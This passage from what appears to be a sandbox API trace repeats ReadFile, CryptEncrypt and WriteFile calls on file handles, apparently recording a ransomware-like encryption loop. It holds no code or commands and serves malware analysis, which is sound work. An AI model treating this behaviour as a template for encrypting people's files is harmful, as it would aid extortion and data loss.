pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.248] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.248] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.248] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.248] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.248] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.248] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.248] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.248] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.248] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.248] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.248] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.248] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.248] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.249] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.249] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.249] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.249] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.249] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.249] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.249] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.249] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.249] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.249] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.249] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.249] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.249] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.249] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.249] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.249] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.250] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.250] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.250] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.250] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.250] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.250] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.250] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.250] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.250] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.250] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.250] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.250] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.250] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.250] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.250] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.250] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.250] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.251] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.251] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.251] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.251] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.251] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.251] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.251] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.251] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.251] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.251] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.251] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.251] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.251] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.251] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.251] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.251] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.251] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.251] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.252] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.252] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.252] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.252] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.252] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.252] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.252] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.252] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.252] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.252] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.252] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.252] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.252] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.252] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.252] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.252] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.253] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.253] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.253] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.253] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.253] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.253] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.253] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.253] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.253] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.253] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.253] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.253] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.253] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.253] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.253] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.253] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.253] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.254] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.254] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.254] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.254] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.254] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.254] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.254] ReadFile (in: 